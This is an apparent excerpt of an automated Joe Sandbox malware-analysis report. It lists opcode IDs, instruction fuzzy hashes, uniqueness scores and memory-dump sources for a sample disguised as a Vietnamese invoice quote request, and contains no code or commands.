                                                                                                                                                                                                                                                                  • Opcode ID: 0c2768f63c97f4575cfa302e67ba70be0daf02c4ff8bed6397b80c4c8d6dfee0
                                                                                                                                                                                                                                                                  • Instruction ID: fea0ab4c9b40402640c637cd9334d16cbc306674872c46942836b5c8049e1e51
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c2768f63c97f4575cfa302e67ba70be0daf02c4ff8bed6397b80c4c8d6dfee0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D52158F0A0051ADFCF14CF95C8869AE7BB2BFA8254F108069F911E7260EB30C955CBA0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.353804742.0000000000A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A5D000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a5d000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 61e8f8e54cf6e2f0f54ff5a1b79d4fe922f9cdaac3edaff0dabfe544e0b23fd3
                                                                                                                                                                                                                                                                  • Instruction ID: bd2c36ca1927938caef49c53292af26d6a989974ce4efd651b28c8b33ec2d909
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 61e8f8e54cf6e2f0f54ff5a1b79d4fe922f9cdaac3edaff0dabfe544e0b23fd3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 01216F755093C08FDB12CF20D994B15BF71FB46314F28C6EAD8498B697C33A984ACB62
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: f39c94bc9b17cb6af620c66cad3457cdcfb2e9af8161ae4641877996fb4ca200
                                                                                                                                                                                                                                                                  • Instruction ID: dfc907c2e1ec69c66e652be217dfc2830c11111ae9425c17e263b3c0618006a1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f39c94bc9b17cb6af620c66cad3457cdcfb2e9af8161ae4641877996fb4ca200
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E11B470229118C7EB1C9F24D01D32A77B6AB95706F50C81ED147CBB89CFB5D8518BE2
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 5089cce7a8b9340caf8ad61eeec9f230c46b20c1ead775675bf1e62ff7f4632b
                                                                                                                                                                                                                                                                  • Instruction ID: 7666428886ca5bd7fd366820b0fcfdc872056b22c4cd34f25175851f0ab40953
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5089cce7a8b9340caf8ad61eeec9f230c46b20c1ead775675bf1e62ff7f4632b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 821102B5E0021D8FDB04DFA9D404AEEBBB9FB88355F10402AD505B7250DB745A85CBA1
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.353623703.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_8fd000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 8d778767f53fd0a6c663cb8d613203c36db215e48ccc3c7032546bce1bc62798
                                                                                                                                                                                                                                                                  • Instruction ID: 4260c65c086bd5989f68b27c99bccf261709bb362e32e67006421b4dd310f998
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d778767f53fd0a6c663cb8d613203c36db215e48ccc3c7032546bce1bc62798
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5611B176404284CFCB11CF10D5C4B26BF72FB98324F28C6A9DA454B656C33AD85ACBA2
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373089535.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_76f0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: d267900168d3ca438df53934e3a74c4241f8dd2ff22d4799d0e42b907279878f
                                                                                                                                                                                                                                                                  • Instruction ID: 65f3f5d8146e8b7c0ecdbce07c49cb30058545a3e2be23b30ce01f1e7fa43ae5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d267900168d3ca438df53934e3a74c4241f8dd2ff22d4799d0e42b907279878f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A1125B480938DDFCB1A8BB4D9602ADBFB0AB07240F1544D7C19ADB292D3392E49CB51
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 102b4a3650d7ac9f5becab296706d9d5fc25e633d4a5ef51eb4078d351bdf0af
                                                                                                                                                                                                                                                                  • Instruction ID: 23455d18a862d42f4c5ef5c2a68cf313e3765fc7daa15f3d28bac727fb94fd35
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 102b4a3650d7ac9f5becab296706d9d5fc25e633d4a5ef51eb4078d351bdf0af
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FD11D7B5D04218CBDB28CF2AD8447ADBBFAFB89340F04C0AAD509A7254DB7459858F52
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: e39698965ae5667dc52be30bbe8864a9a9e742cec903bd5faf5a9aa0b9251654
                                                                                                                                                                                                                                                                  • Instruction ID: fb7581c0e72c599f35223302eed46d3d0c4a1dacc5ea940a565c00513c10eef4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e39698965ae5667dc52be30bbe8864a9a9e742cec903bd5faf5a9aa0b9251654
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 501125B4E01219CFDB05DBA8D444AEEBBF5FB8C354F14816AD504B7360DB385A45CBA1
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 02a58938d25350f1c208d6b96c6c2eb5799bba23ab975ba2c826d874d827698d
                                                                                                                                                                                                                                                                  • Instruction ID: e3076e07fdf01ba4dfa6978308964f43b6596037a3424c6b22ff4244acfb4b47
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 02a58938d25350f1c208d6b96c6c2eb5799bba23ab975ba2c826d874d827698d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 39F0F4B67081195F5710DA5DE854D6FF7EDDBD42B0701812BEA08C7700EB31EC018394
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373089535.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_76f0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: dd612296af907fca204554f6e906487605ff5a6b13d26ab43dddc4a3546b9d94
                                                                                                                                                                                                                                                                  • Instruction ID: 840fb005408b5768b6f24e0d7c389f8e14c776e32f3e05a02a6c92125440cdf7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dd612296af907fca204554f6e906487605ff5a6b13d26ab43dddc4a3546b9d94
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C113970909388DFCB06CBA8D465298BFB0AF07201F1980E6D595EB392D7385E45CB22
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 9364aa87e34a98ca9f9cf037e25672e640f2015c416389f100289545ff4b97d0
                                                                                                                                                                                                                                                                  • Instruction ID: ef79139fbc235319ee3d4d74a0a9c27a0fd9ccf92873a61aa9db67cacccae975
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9364aa87e34a98ca9f9cf037e25672e640f2015c416389f100289545ff4b97d0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B31130B4E00209BF9B44EFB8C8419BEB7F2FFC4204B60896A9515EB250DA705A058B91
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 83e8762938371d69cb635303f7fd3c50b12c43cfcc6ad87c89725ad93d6289a2
                                                                                                                                                                                                                                                                  • Instruction ID: 81ffa40616bdcf536383f604a16b233c5adef6d86a48a98c077de5d4c1b444e8
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83e8762938371d69cb635303f7fd3c50b12c43cfcc6ad87c89725ad93d6289a2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5F06D733045194F5705DEAEAC8892FB7AAFBE9661724023EE509C3360DFB1CC4286A0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373089535.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_76f0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: f690d875111971ca93d0c4481aeaa77d403cec7dd1738a2a8b3b03e615bcc5a1
                                                                                                                                                                                                                                                                  • Instruction ID: af3de81ad460d440573328d32bbebd4a003b4dcec0d1f3f953763426d699164c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f690d875111971ca93d0c4481aeaa77d403cec7dd1738a2a8b3b03e615bcc5a1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 041105B4E1420DEFDB18DFA9C5556ADBBB2FB46340F1144A9C61AA7340D7346E41CB41
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 0d69646a7f613dc7c095e8e6bc6a34e914dd62ce9bca16636ab42784bfae42b3
                                                                                                                                                                                                                                                                  • Instruction ID: a2f252d407c74882d38f3eae3ffac5f30c9bb2a9141d5013e59564dfc1a9a797
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d69646a7f613dc7c095e8e6bc6a34e914dd62ce9bca16636ab42784bfae42b3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA0181B670061A9B8725DA6AD440856B3E6FBD9624314857EDA08CB794CB32EC42CBD0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: ce66c8df3620010dbaa369c0a07c9f92db92e98dde01099306a5cc0f51a996b9
                                                                                                                                                                                                                                                                  • Instruction ID: 8e16e409574445d6e39e85a6271378e6346bfda87006521e837d9eba5fab980f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce66c8df3620010dbaa369c0a07c9f92db92e98dde01099306a5cc0f51a996b9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A1112634A005598FE710EF25CC546ADB7B2EB88308F1041E99509BB754DB346E858F80
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 5187932240b55082c556689d81f86fcc50e4f017071abbed692540a9152c1b0f
                                                                                                                                                                                                                                                                  • Instruction ID: 6f9ab5c227b3e4692309b0b23b8e30c526d6dd7e3a46873cd19b1c8a3228f10e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5187932240b55082c556689d81f86fcc50e4f017071abbed692540a9152c1b0f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA1129B1D00248CFDB04CFA9D084BACB7F5FB49358F15C429E005AB258D7789889CF01
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 7d1ed1d28560679972c2e6c6f158fe7383bfdb4edcd11d2703b3019aa20428f7
                                                                                                                                                                                                                                                                  • Instruction ID: 22e526f40a54dd4f2926f6abd2265fc00c28fccbf08f4ce49a4a9b66baefe580
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d1ed1d28560679972c2e6c6f158fe7383bfdb4edcd11d2703b3019aa20428f7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A7F04CBA505148EFD301DFB0D9105AD7B75EF86208F2880DBD900EB261DF31AE00DB92
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373089535.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_76f0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: c1bcccfdb7e721facf6c69385a204ee4aa7bde852be8a4163bfc85dd38517ab2
                                                                                                                                                                                                                                                                  • Instruction ID: 5c38bb34310690ec654274384e102da51c6e29ce989085509e7d50b25f3d5ee5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c1bcccfdb7e721facf6c69385a204ee4aa7bde852be8a4163bfc85dd38517ab2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F0124B4E0420CEFDB18DBA9D055AACBBF2EF8A241F1580E5D615A7341C734AE42DB11
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 77703d1fcebbc21b36294d6b3b7ecd8d12193b16a9052a8365b8ea9b96d947c1
                                                                                                                                                                                                                                                                  • Instruction ID: 32ab2a2c65339fdce01e123490bc923a2858f07422eaf329bdc4ddbde70bcdd7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77703d1fcebbc21b36294d6b3b7ecd8d12193b16a9052a8365b8ea9b96d947c1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51014B74D0420C9FDB01EFA8D9102ADBBF5FB48348F0480AAD518E7356DB345E118B51
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 1069af616c563c6d833a8ed9a0a2c491e4fdd87588223414744f16260e892abb
                                                                                                                                                                                                                                                                  • Instruction ID: 718d16ec622f4b35afcb702faf1f38b286d38056f5afb36bb8b917bee25072a4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1069af616c563c6d833a8ed9a0a2c491e4fdd87588223414744f16260e892abb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5311E8F4901218CFDB60DF61D88879DBBB6FB89305F10849AD609A7240CB745EC5CF15
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 8c69d8c3ddcdb7364ab3fe6c46ad7947b4edb6cea53c1798c0d5eb0f52e3d51a
                                                                                                                                                                                                                                                                  • Instruction ID: f1924d4af970884f6ac83667e8218ce930532f3122df0140c473896d7b2900ae
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c69d8c3ddcdb7364ab3fe6c46ad7947b4edb6cea53c1798c0d5eb0f52e3d51a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6AF0E9B17041159FE318CA0DD854B7EB7E9EF8D2B0B154469E909C7340CFB2AC808794
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: e025b5568af72175e8fe378c96b385faf36bc5182b4882ff9e628a8309c1ee29
                                                                                                                                                                                                                                                                  • Instruction ID: 3b32f2fbf3b2efe7f720377296203c185413880548ba72e73abe14b66cc0c5c2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e025b5568af72175e8fe378c96b385faf36bc5182b4882ff9e628a8309c1ee29
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82F0F6B090D2899FEB069B30E8671E87F70AE57201F0481EAC945C68A2DB34146BC782
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 377451a07b214ee39cf4736b55d5e415fb7278239f338621ab4df955e3deaa30
                                                                                                                                                                                                                                                                  • Instruction ID: 98eafca78c5814af4bf5be9be09c71d95981cfb3fe3e8d605100cb6cba477449
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 377451a07b214ee39cf4736b55d5e415fb7278239f338621ab4df955e3deaa30
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9F082343005049FC304EA6DE549D2E73DADFC66517654479E205CF360DE76EC028B56
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

